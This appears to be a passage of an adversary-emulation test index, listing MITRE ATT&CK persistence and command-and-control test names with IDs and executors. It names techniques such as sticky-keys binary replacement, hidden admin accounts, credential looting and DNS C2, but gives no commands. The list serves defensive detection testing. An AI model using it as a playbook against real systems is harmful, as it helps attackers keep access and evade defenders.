1288 persistence T1136.001 Create Account: Local Account 3 Create a user account on a MacOS system 01993ba5-1da3-4e15-a719-b690d4f0f0b2 bash
1289 persistence T1136.001 Create Account: Local Account 4 Create a new user in a command prompt 6657864e-0323-4206-9344-ac9cd7265a4f command_prompt
1290 persistence T1136.001 Create Account: Local Account 5 Create a new user in PowerShell bc8be0ac-475c-4fbf-9b1d-9fffd77afbde powershell
1291 persistence T1136.001 Create Account: Local Account 6 Create a new user in Linux with `root` UID and GID. a1040a30-d28b-4eda-bd99-bb2861a4616c bash
1292 persistence T1136.001 Create Account: Local Account 7 Create a new user in FreeBSD with `root` GID. d141afeb-d2bc-4934-8dd5-b7dba0f9f67a sh
1293 persistence T1136.001 Create Account: Local Account 8 Create a new Windows admin user fda74566-a604-4581-a4cc-fbbe21d66559 command_prompt
1294 persistence T1136.001 Create Account: Local Account 9 Create a new Windows admin user via .NET 2170d9b5-bacd-4819-a952-da76dae0815f powershell
1295 persistence T1136.001 Create Account: Local Account 10 Create a Linux user via kubectl in a Pod d9efa6c7-6518-42b2-809a-4f2a8e242b9b bash
1296 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 1 Winlogon Shell Key Persistence - PowerShell bf9f9d65-ee4d-4c3e-a843-777d04f19c38 powershell
1297 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 2 Winlogon Userinit Key Persistence - PowerShell fb32c935-ee2e-454b-8fa3-1c46b42e8dfb powershell
1298 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 3 Winlogon Notify Key Logon Persistence - PowerShell d40da266-e073-4e5a-bb8b-2b385023e5f9 powershell
1299 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 4 Winlogon HKLM Shell Key Persistence - PowerShell 95a3c42f-8c88-4952-ad60-13b81d929a9d powershell
1300 persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL 5 Winlogon HKLM Userinit Key Persistence - PowerShell f9b8daff-8fa7-4e6a-a1a7-7c14675a545b powershell
1301 persistence T1098.004 SSH Authorized Keys 1 Modify SSH Authorized Keys 342cc723-127c-4d3a-8292-9c0c6b4ecadc sh
1302 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 1 IFEO Add Debugger fdda2626-5234-4c90-b163-60849a24c0b8 command_prompt
1303 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 2 IFEO Global Flags 46b1f278-c8ee-4aa5-acce-65e77b11f3c1 command_prompt
1304 persistence T1546.012 Event Triggered Execution: Image File Execution Options Injection 3 GlobalFlags in Image File Execution Options 13117939-c9b2-4a43-999e-0a543df92f0d powershell
1305 persistence T1546.008 Event Triggered Execution: Accessibility Features 1 Attaches Command Prompt as a Debugger to a List of Target Processes 3309f53e-b22b-4eb6-8fd2-a6cf58b355a9 powershell
1306 persistence T1546.008 Event Triggered Execution: Accessibility Features 2 Replace binary of sticky keys 934e90cf-29ca-48b3-863c-411737ad44e3 command_prompt
1307 persistence T1546.008 Event Triggered Execution: Accessibility Features 3 Create Symbolic Link From osk.exe to cmd.exe 51ef369c-5e87-4f33-88cd-6d61be63edf2 command_prompt
1308 persistence T1546.008 Event Triggered Execution: Accessibility Features 4 Atbroker.exe (AT) Executes Arbitrary Command via Registry Key 444ff124-4c83-4e28-8df6-6efd3ece6bd4 command_prompt
1309 persistence T1546.008 Event Triggered Execution: Accessibility Features 5 Auto-start application on user logon 7125eba8-7b30-426b-9147-781d152be6fb command_prompt
1310 persistence T1546.008 Event Triggered Execution: Accessibility Features 6 Replace utilman.exe (Ease of Access Binary) with cmd.exe 1db380da-3422-481d-a3c8-6d5770dba580 command_prompt
1311 persistence T1546.008 Event Triggered Execution: Accessibility Features 7 Replace Magnify.exe (Magnifier binary) with cmd.exe 5e4fa70d-c789-470e-85e1-6992b92bb321 command_prompt
1312 persistence T1546.008 Event Triggered Execution: Accessibility Features 8 Replace Narrator.exe (Narrator binary) with cmd.exe 2002f5ea-cd13-4c82-bf73-e46722e5dc5e command_prompt
1313 persistence T1546.008 Event Triggered Execution: Accessibility Features 9 Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe 825ba8ca-71cc-436b-b1dd-ea0d5e109086 command_prompt
1314 persistence T1546.008 Event Triggered Execution: Accessibility Features 10 Replace AtBroker.exe (App Switcher binary) with cmd.exe 210be7ea-d841-40ec-b3e1-ff610bb62744 command_prompt
1315 persistence T1136.002 Create Account: Domain Account 1 Create a new Windows domain admin user fcec2963-9951-4173-9bfa-98d8b7834e62 command_prompt
1316 persistence T1136.002 Create Account: Domain Account 2 Create a new account similar to ANONYMOUS LOGON dc7726d2-8ccb-4cc6-af22-0d5afb53a548 command_prompt
1317 persistence T1136.002 Create Account: Domain Account 3 Create a new Domain Account using PowerShell 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 powershell
1318 persistence T1136.002 Create Account: Domain Account 4 Active Directory Create Admin Account 562aa072-524e-459a-ba2b-91f1afccf5ab sh
1319 persistence T1136.002 Create Account: Domain Account 5 Active Directory Create User Account (Non-elevated) 8c992cb3-a46e-4fd5-b005-b1bab185af31 sh
1320 persistence T1137.001 Office Application Startup: Office Template Macros. 1 Injecting a Macro into the Word Normal.dotm Template for Persistence via PowerShell 940db09e-80b6-4dd0-8d4d-7764f89b47a8 powershell
1321 persistence T1546.009 Event Triggered Execution: AppCert DLLs 1 Create registry persistence via AppCert DLL a5ad6104-5bab-4c43-b295-b4c44c7c6b05 powershell
1322 persistence T1547.015 Boot or Logon Autostart Execution: Login Items 1 Persistence by modifying Windows Terminal profile ec5d76ef-82fe-48da-b931-bdb25a62bc65 powershell
1323 persistence T1547.015 Boot or Logon Autostart Execution: Login Items 2 Add macOS LoginItem using Applescript 716e756a-607b-41f3-8204-b214baf37c1d bash
1324 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 1 Azure AD Application Hijacking - Service Principal b8e747c3-bdf7-4d71-bce2-f1df2a057406 powershell
1325 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 2 Azure AD Application Hijacking - App Registration a12b5531-acab-4618-a470-0dafb294a87a powershell
1326 persistence T1098.001 Account Manipulation: Additional Cloud Credentials 3 AWS - Create Access Key and Secret Key 8822c3b0-d9f9-4daf-a043-491160a31122 sh
1327 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 1 Persistence via WMI Event Subscription - CommandLineEventConsumer 3c64f177-28e2-49eb-a799-d767b24dd1e0 powershell
1328 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 2 Persistence via WMI Event Subscription - ActiveScriptEventConsumer fecd0dfd-fb55-45fa-a10b-6250272d0832 powershell
1329 persistence T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription 3 Windows MOFComp.exe Load MOF File 29786d7e-8916-4de6-9c55-be7b093b2706 powershell
1330 persistence T1546.001 Event Triggered Execution: Change Default File Association 1 Change Default File Association 10a08978-2045-4d62-8c42-1957bbbea102 command_prompt
1331 persistence T1546.014 Event Triggered Execution: Emond 1 Persistance with Event Monitor - emond 23c9c127-322b-4c75-95ca-eff464906114 sh
1332 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 1 Reg Key Run e55be3fd-3521-4610-9d1a-e210e42dcf05 command_prompt
1333 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 2 Reg Key RunOnce 554cbd88-cde1-4b56-8168-0be552eed9eb command_prompt
1334 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 3 PowerShell Registry RunOnce eb44f842-0457-4ddc-9b92-c4caa144ac42 powershell
1335 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 4 Suspicious vbs file run from startup Folder 2cb98256-625e-4da9-9d44-f2e5f90b8bd5 powershell
1336 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 5 Suspicious jse file run from startup Folder dade9447-791e-4c8f-b04b-3a35855dfa06 powershell
1337 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 6 Suspicious bat file run from startup Folder 5b6768e4-44d2-44f0-89da-a01d1430fd5e powershell
1338 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 7 Add Executable Shortcut Link to User Startup Folder 24e55612-85f6-4bd6-ae74-a73d02e3441d powershell
1339 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 8 Add persistance via Recycle bin bda6a3d6-7aa7-4e89-908b-306772e9662f command_prompt
1340 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 9 SystemBC Malware-as-a-Service Registry 9dc7767b-30c1-4cc4-b999-50cab5e27891 powershell
1341 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 10 Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value acfef903-7662-447e-a391-9c91c2f00f7b powershell
1342 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 11 Change Startup Folder - HKCU Modify User Shell Folders Startup Value 8834b65a-f808-4ece-ad7e-2acdf647aafa powershell
1343 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 12 HKCU - Policy Settings Explorer Run Key a70faea1-e206-4f6f-8d9a-67379be8f6f1 powershell
1344 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 13 HKLM - Policy Settings Explorer Run Key b5c9a9bc-dda3-4ea0-b16a-add8e81ab75f powershell
1345 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 14 HKLM - Append Command to Winlogon Userinit KEY Value f7fab6cc-8ece-4ca7-a0f1-30a22fccd374 powershell
1346 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 15 HKLM - Modify default System Shell - Winlogon Shell KEY Value 1d958c61-09c6-4d9e-b26b-4130314e520e powershell
1347 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 16 secedit used to create a Run key in the HKLM Hive 14fdc3f1-6fc3-4556-8d36-aa89d9d42d02 command_prompt
1348 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 17 Modify BootExecute Value befc2b40-d487-4a5a-8813-c11085fb5672 powershell
1349 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 18 Allowing custom application to execute during new RDP logon session b051b3c0-66e7-4a81-916d-e6383bd3a669 command_prompt
1350 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 19 Creating Boot Verification Program Key for application execution during successful boot 6e1666d5-3f2b-4b9a-80aa-f011322380d4 command_prompt
1351 persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder 20 Add persistence via Windows Context Menu de47f4a0-2acb-416d-9a6b-cee584a4c4d1 command_prompt
1352 persistence T1136.003 Create Account: Cloud Account 1 AWS - Create a new IAM user 8d1c2368-b503-40c9-9057-8e42f21c58ad sh
1353 persistence T1136.003 Create Account: Cloud Account 2 Azure AD - Create a new user e62d23ef-3153-4837-8625-fa4a3829134d powershell
1354 persistence T1136.003 Create Account: Cloud Account 3 Azure AD - Create a new user via Azure CLI 228c7498-be31-48e9-83b7-9cb906504ec8 powershell
1355 persistence T1098 Account Manipulation 1 Admin Account Manipulate 5598f7cb-cf43-455e-883a-f6008c5d46af powershell
1356 persistence T1098 Account Manipulation 2 Domain Account and Group Manipulate a55a22e9-a3d3-42ce-bd48-2653adb8f7a9 powershell
1357 persistence T1098 Account Manipulation 3 AWS - Create a group and add a user to that group 8822c3b0-d9f9-4daf-a043-49f110a31122 sh
1358 persistence T1098 Account Manipulation 4 Azure AD - adding user to Azure AD role 0e65ae27-5385-46b4-98ac-607a8ee82261 powershell
1359 persistence T1098 Account Manipulation 5 Azure AD - adding service principal to Azure AD role 92c40b3f-c406-4d1f-8d2b-c039bf5009e4 powershell
1360 persistence T1098 Account Manipulation 6 Azure - adding user to Azure role in subscription 1a94b3fc-b080-450a-b3d8-6d9b57b472ea powershell
1361 persistence T1098 Account Manipulation 7 Azure - adding service principal to Azure role in subscription c8f4bc29-a151-48da-b3be-4680af56f404 powershell
1362 persistence T1098 Account Manipulation 8 Azure AD - adding permission to application 94ea9cc3-81f9-4111-8dde-3fb54f36af4b powershell
1363 persistence T1098 Account Manipulation 9 Password Change on Directory Service Restore Mode (DSRM) Account d5b886d9-d1c7-4b6e-a7b0-460041bf2823 command_prompt
1364 persistence T1098 Account Manipulation 10 Domain Password Policy Check: Short Password fc5f9414-bd67-4f5f-a08e-e5381e29cbd1 powershell
1365 persistence T1098 Account Manipulation 11 Domain Password Policy Check: No Number in Password 68190529-069b-4ffc-a942-919704158065 powershell
1366 persistence T1098 Account Manipulation 12 Domain Password Policy Check: No Special Character in Password 7d984ef2-2db2-4cec-b090-e637e1698f61 powershell
1367 persistence T1098 Account Manipulation 13 Domain Password Policy Check: No Uppercase Character in Password b299c120-44a7-4d68-b8e2-8ba5a28511ec powershell
1368 persistence T1098 Account Manipulation 14 Domain Password Policy Check: No Lowercase Character in Password 945da11e-977e-4dab-85d2-f394d03c5887 powershell
1369 persistence T1098 Account Manipulation 15 Domain Password Policy Check: Only Two Character Classes 784d1349-5a26-4d20-af5e-d6af53bae460 powershell
1370 persistence T1098 Account Manipulation 16 Domain Password Policy Check: Common Password Use 81959d03-c51f-49a1-bb24-23f1ec885578 powershell
1371 persistence T1098 Account Manipulation 17 GCP - Delete Service Account Key 7ece1dea-49f1-4d62-bdcc-5801e3292510 sh
1372 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 1 Linux - Load Kernel Module via insmod 687dcb93-9656-4853-9c36-9977315e9d23 bash
1373 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 2 MacOS - Load Kernel Module via kextload and kmutil f4391089-d3a5-4dd1-ab22-0419527f2672 bash
1374 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 3 MacOS - Load Kernel Module via KextManagerLoadKextWithURL() f0007753-beb3-41ea-9948-760785e4c1e5 bash
1375 persistence T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions 4 Snake Malware Kernel Driver Comadmin e5cb5564-cc7b-4050-86e8-f2d9eec1941f powershell
1376 persistence T1053.006 Scheduled Task/Job: Systemd Timers 1 Create Systemd Service and Timer f4983098-bb13-44fb-9b2c-46149961807b bash
1377 persistence T1053.006 Scheduled Task/Job: Systemd Timers 2 Create a user level transient systemd service and timer 3de33f5b-62e5-4e63-a2a0-6fd8808c80ec sh
1378 persistence T1053.006 Scheduled Task/Job: Systemd Timers 3 Create a system level transient systemd service and timer d3eda496-1fc0-49e9-aff5-3bec5da9fa22 sh
1379 persistence T1505.004 IIS Components 1 Install IIS Module using AppCmd.exe 53adbdfa-8200-490c-871c-d3b1ab3324b2 command_prompt
1380 persistence T1505.004 IIS Components 2 Install IIS Module using PowerShell Cmdlet New-WebGlobalModule cc3381fb-4bd0-405c-a8e4-6cacfac3b06c powershell
1381 persistence T1546 Event Triggered Execution 1 Persistence with Custom AutodialDLL aca9ae16-7425-4b6d-8c30-cad306fdbd5b powershell
1382 persistence T1546 Event Triggered Execution 2 HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) a574dafe-a903-4cce-9701-14040f4f3532 powershell
1383 persistence T1546 Event Triggered Execution 3 HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) 36b8dbf9-59b1-4e9b-a3bb-36e80563ef01 powershell
1384 persistence T1546 Event Triggered Execution 4 WMI Invoke-CimMethod Start Process adae83d3-0df6-45e7-b2c3-575f91584577 powershell
1385 persistence T1546 Event Triggered Execution 5 Adding custom debugger for Windows Error Reporting 17d1a3cc-3373-495a-857a-e5dd005fb302 command_prompt
1386 persistence T1546 Event Triggered Execution 6 Load custom DLL on mstsc execution 2db7852e-5a32-4ec7-937f-f4e027881700 command_prompt
1387 persistence T1546 Event Triggered Execution 7 Persistence using automatic execution of custom DLL during RDP session b7fc4c3f-fe6e-479a-ba27-ef91b88536e3 command_prompt
1388 persistence T1546 Event Triggered Execution 8 Persistence via ErrorHandler.cmd script execution 547a4736-dd1c-4b48-b4fe-e916190bb2e7 powershell
1389 persistence T1546 Event Triggered Execution 9 Persistence using STARTUP-PATH in MS-WORD f0027655-25ef-47b0-acaf-3d83d106156c command_prompt
1390 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 1 Add command to .bash_profile 94500ae1-7e31-47e3-886b-c328da46872f sh
1391 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 2 Add command to .bashrc 0a898315-4cfa-4007-bafe-33a4646d115f sh
1392 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 3 Add command to .shrc 41502021-591a-4649-8b6e-83c9192aff53 sh
1393 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 4 Append to the system shell profile 694b3cc8-6a78-4d35-9e74-0123d009e94b sh
1394 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 5 Append commands user shell profile bbdb06bc-bab6-4f5b-8232-ba3fbed51d77 sh
1395 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 6 System shell profile scripts 8fe2ccfd-f079-4c03-b1a9-bd9b362b67d4 sh
1396 persistence T1546.004 Event Triggered Execution: .bash_profile .bashrc and .shrc 7 Create/Append to .bash_logout 37ad2f24-7c53-4a50-92da-427a4ad13f58 bash
1397 persistence T1547.002 Authentication Package 1 Authentication Package be2590e8-4ac3-47ac-b4b5-945820f2fbe9 powershell
1398 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 1 COM Hijacking - InprocServer32 48117158-d7be-441b-bc6a-d9e36e47b52b powershell
1399 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 2 Powershell Execute COM Object 752191b1-7c71-445c-9dbe-21bb031b18eb powershell
1400 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 3 COM Hijacking with RunDLL32 (Local Server Switch) 123520cc-e998-471b-a920-bd28e3feafa0 powershell
1401 persistence T1546.015 Event Triggered Execution: Component Object Model Hijacking 4 COM hijacking via TreatAs 33eacead-f117-4863-8eb0-5c6304fbfaa9 powershell
1402 persistence T1137.004 Office Application Startup: Outlook Home Page 1 Install Outlook Home Page Persistence 7a91ad51-e6d2-4d43-9471-f26362f5738e command_prompt
1403 persistence T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path 1 Execution of program.exe as service with unquoted service path 2770dea7-c50f-457b-84c4-c40a47460d9f command_prompt
1404 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 1 Add file to Local Library StartupItems 134627c3-75db-410e-bff8-7a920075f198 sh
1405 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 2 Add launch script to launch daemon fc369906-90c7-4a15-86fd-d37da624dde6 bash
1406 persistence T1037.005 Boot or Logon Initialization Scripts: Startup Items 3 Add launch script to launch agent 10cf5bec-49dd-4ebf-8077-8f47e420096f bash
1407 persistence T1197 BITS Jobs 1 Bitsadmin Download (cmd) 3c73d728-75fb-4180-a12f-6712864d7421 command_prompt
1408 persistence T1197 BITS Jobs 2 Bitsadmin Download (PowerShell) f63b8bc4-07e5-4112-acba-56f646f3f0bc powershell
1409 persistence T1197 BITS Jobs 3 Persist, Download, & Execute 62a06ec5-5754-47d2-bcfc-123d8314c6ae command_prompt
1410 persistence T1197 BITS Jobs 4 Bits download using desktopimgdownldr.exe (cmd) afb5e09e-e385-4dee-9a94-6ee60979d114 command_prompt
1411 persistence T1546.010 Event Triggered Execution: AppInit DLLs 1 Install AppInit Shim a58d9386-3080-4242-ab5f-454c16503d18 command_prompt
1412 persistence T1546.002 Event Triggered Execution: Screensaver 1 Set Arbitrary Binary as Screensaver 281201e7-de41-4dc9-b73d-f288938cbb64 command_prompt
1413 persistence T1543.001 Create or Modify System Process: Launch Agent 1 Launch Agent a5983dee-bf6c-4eaf-951c-dbc1a7b90900 bash
1414 persistence T1543.001 Create or Modify System Process: Launch Agent 2 Event Monitor Daemon Persistence 11979f23-9b9d-482a-9935-6fc9cd022c3e bash
1415 persistence T1543.001 Create or Modify System Process: Launch Agent 3 Launch Agent - Root Directory 66774fa8-c562-4bae-a58d-5264a0dd9dd7 bash
1416 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 1 rc.common 97a48daa-8bca-4bc0-b1a9-c1d163e762de bash
1417 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 2 rc.common c33f3d80-5f04-419b-a13a-854d1cbdbf3a bash
1418 persistence T1037.004 Boot or Logon Initialization Scripts: Rc.common 3 rc.local 126f71af-e1c9-405c-94ef-26a47b16c102 sh
1419 persistence T1543.002 Create or Modify System Process: SysV/Systemd Service 1 Create Systemd Service d9e4f24f-aa67-4c6e-bcbf-85622b697a7c bash
1420 persistence T1543.002 Create or Modify System Process: SysV/Systemd Service 2 Create SysV Service 760fe8d2-79d9-494f-905e-a239a3df86f6 sh
1421 persistence T1543.002 Create or Modify System Process: SysV/Systemd Service 3 Create Systemd Service file, Enable the service , Modify and Reload the service. c35ac4a8-19de-43af-b9f8-755da7e89c89 bash
1422 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 1 Copy in loginwindow.plist for Re-Opened Applications 5fefd767-ef54-4ac6-84d3-751ab85e8aba sh
1423 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 2 Re-Opened Applications using LoginHook 5f5b71da-e03f-42e7-ac98-d63f9e0465cb sh
1424 persistence T1547.007 Boot or Logon Autostart Execution: Re-opened Applications 3 Append to existing loginwindow for Re-Opened Applications 766b6c3c-9353-4033-8b7e-38b309fa3a93 sh
1425 persistence T1098.002 Account Manipulation: Additional Email Delegate Permissions 1 EXO - Full access mailbox permission granted to a user 17d046be-fdd0-4cbb-b5c7-55c85d9d0714 powershell
1426 persistence T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows) 1 Logon Scripts d6042746-07d4-4c92-9ad8-e644c114a231 command_prompt
1427 persistence T1137.002 Office Application Startup: Office Test 1 Office Application Startup Test Persistence (HKCU) c3e35b58-fe1c-480b-b540-7600fb612563 powershell
1428 persistence T1547.008 Boot or Logon Autostart Execution: LSASS Driver 1 Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt 8ecef16d-d289-46b4-917b-0dba6dc81cf1 powershell
1429 persistence T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
1430 persistence T1078.004 Valid Accounts: Cloud Accounts 2 Azure Persistence Automation Runbook Created or Modified 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac powershell
1431 persistence T1078.004 Valid Accounts: Cloud Accounts 3 GCP - Create Custom IAM Role 3a159042-69e6-4398-9a69-3308a4841c85 sh
1432 persistence T1053.002 Scheduled Task/Job: At 1 At.exe Scheduled task 4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8 command_prompt
1433 persistence T1053.002 Scheduled Task/Job: At 2 At - Schedule a job 7266d898-ac82-4ec0-97c7-436075d0d08e sh
1434 persistence T1053.002 Scheduled Task/Job: At 3 At - Schedule a job via kubectl in a Pod 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213 bash
1435 persistence T1546.007 Event Triggered Execution: Netsh Helper DLL 1 Netsh Helper DLL Registration 3244697d-5a3a-4dfc-941c-550f69f91a4d command_prompt
1436 persistence T1078.003 Valid Accounts: Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
1437 persistence T1078.003 Valid Accounts: Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
1438 persistence T1078.003 Valid Accounts: Local Accounts 3 Create local account with admin privileges using sysadminctl utility - MacOS 191db57d-091a-47d5-99f3-97fde53de505 bash
1439 persistence T1078.003 Valid Accounts: Local Accounts 4 Enable root account using dsenableroot utility - MacOS 20b40ea9-0e17-4155-b8e6-244911a678ac bash
1440 persistence T1078.003 Valid Accounts: Local Accounts 5 Add a new/existing user to the admin group using dseditgroup utility - macOS 433842ba-e796-4fd5-a14f-95d3a1970875 bash
1441 persistence T1078.003 Valid Accounts: Local Accounts 6 WinPwn - Loot local Credentials - powerhell kittie 9e9fd066-453d-442f-88c1-ad7911d32912 powershell
1442 persistence T1078.003 Valid Accounts: Local Accounts 7 WinPwn - Loot local Credentials - Safetykatz e9fdb899-a980-4ba4-934b-486ad22e22f4 powershell
1443 persistence T1078.003 Valid Accounts: Local Accounts 8 Create local account (Linux) 02a91c34-8a5b-4bed-87af-501103eb5357 bash
1444 persistence T1078.003 Valid Accounts: Local Accounts 9 Reactivate a locked/expired account (Linux) d2b95631-62d7-45a3-aaef-0972cea97931 bash
1445 persistence T1078.003 Valid Accounts: Local Accounts 10 Reactivate a locked/expired account (FreeBSD) 09e3380a-fae5-4255-8b19-9950be0252cf sh
1446 persistence T1078.003 Valid Accounts: Local Accounts 11 Login as nobody (Linux) 3d2cd093-ee05-41bd-a802-59ee5c301b85 bash
1447 persistence T1078.003 Valid Accounts: Local Accounts 12 Login as nobody (freebsd) 16f6374f-7600-459a-9b16-6a88fd96d310 sh
1448 persistence T1078.003 Valid Accounts: Local Accounts 13 Use PsExec to elevate to NT Authority\SYSTEM account 6904235f-0f55-4039-8aed-41c300ff7733 command_prompt
1449 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 1 User scope COR_PROFILER 9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a powershell
1450 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 2 System Scope COR_PROFILER f373b482-48c8-4ce4-85ed-d40c8b3f7310 powershell
1451 persistence T1574.012 Hijack Execution Flow: COR_PROFILER 3 Registry-free process scope COR_PROFILER 79d57242-bbef-41db-b301-9d01d9f6e817 powershell
1452 command-and-control T1132.001 Data Encoding: Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
1453 command-and-control T1132.001 Data Encoding: Standard Encoding 2 Base64 Encoded data (freebsd) 2d97c626-7652-449e-a986-b02d9051c298 sh
1454 command-and-control T1132.001 Data Encoding: Standard Encoding 3 XOR Encoded data. c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 powershell
1455 command-and-control T1071.004 Application Layer Protocol: DNS 1 DNS Large Query Volume 1700f5d6-5a44-487b-84de-bc66f507b0a6 powershell
1456 command-and-control T1071.004 Application Layer Protocol: DNS 2 DNS Regular Beaconing 3efc144e-1af8-46bb-8ca2-1376bb6db8b6 powershell
1457 command-and-control T1071.004 Application Layer Protocol: DNS 3 DNS Long Domain Query fef31710-223a-40ee-8462-a396d6b66978 powershell
1458 command-and-control T1071.004 Application Layer Protocol: DNS 4 DNS C2 e7bf9802-2e78-4db9-93b5-181b7bcd37d7 powershell
1459 command-and-control T1071 Application Layer Protocol 1 Telnet C2 3b0df731-030c-4768-b492-2a3216d90e53 powershell
1460 command-and-control T1219 Remote Access Software 1 TeamViewer Files Detected Test on Windows 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 powershell
1461 command-and-control T1219 Remote Access Software 2 AnyDesk Files Detected Test on Windows 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 powershell
1462 command-and-control T1219 Remote Access Software 3 LogMeIn Files Detected Test on Windows d03683ec-aae0-42f9-9b4c-534780e0f8e1 powershell
1463 command-and-control T1219 Remote Access Software 4 GoToAssist Files Detected Test on Windows 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 powershell
1464 command-and-control T1219 Remote Access Software 5 ScreenConnect Application Download and Install on Windows 4a18cc4e-416f-4966-9a9d-75731c4684c0 powershell
1465 command-and-control T1219 Remote Access Software 6 Ammyy Admin Software Execution 0ae9e327-3251-465a-a53b-485d4e3f58fa powershell
1466 command-and-control T1219 Remote Access Software 7 RemotePC Software Execution fbff3f1f-b0bf-448e-840f-7e1687affdce powershell
1467 command-and-control T1219 Remote Access Software 8 NetSupport - RAT Execution ecca999b-e0c8-40e8-8416-ad320b146a75 powershell
1468 command-and-control T1219 Remote Access Software 9 UltraViewer - RAT Execution 19acf63b-55c4-4b6a-8552-00a8865105c8 powershell
1469 command-and-control T1219 Remote Access Software 10 UltraVNC Execution 42e51815-a6cc-4c75-b970-3f0ff54b610e powershell
1470 command-and-control T1219 Remote Access Software 11 MSP360 Connect Execution b1b8128b-c5d4-4de9-bf70-e60419274562 powershell
1471 command-and-control T1219 Remote Access Software 12 RustDesk Files Detected Test on Windows f1641ba9-919a-4323-b74f-33372333bf0e powershell
1472 command-and-control T1219 Remote Access Software 13 Splashtop Execution b025c580-029e-4023-888d-a42710d76934 powershell
1473 command-and-control T1219 Remote Access Software 14 Splashtop Streamer Execution 3e1858ee-3550-401c-86ec-5e70ed79295b powershell
1474 command-and-control T1219 Remote Access Software 15 Microsoft App Quick Assist Execution 1aea6d15-70f1-4b4e-8b02-397b5d5ffe75 powershell
1475 command-and-control T1572 Protocol Tunneling 1 DNS over HTTPS Large Query Volume ae9ef4b0-d8c1-49d4-8758-06206f19af0a powershell
1476 command-and-control T1572 Protocol Tunneling 2 DNS over HTTPS Regular Beaconing 0c5f9705-c575-42a6-9609-cbbff4b2fc9b powershell
1477 command-and-control T1572 Protocol Tunneling 3 DNS over HTTPS Long Domain Query 748a73d5-cea4-4f34-84d8-839da5baa99c powershell
1478 command-and-control T1572 Protocol Tunneling 4 run ngrok 4cdc9fc7-53fb-4894-9f0c-64836943ea60 powershell
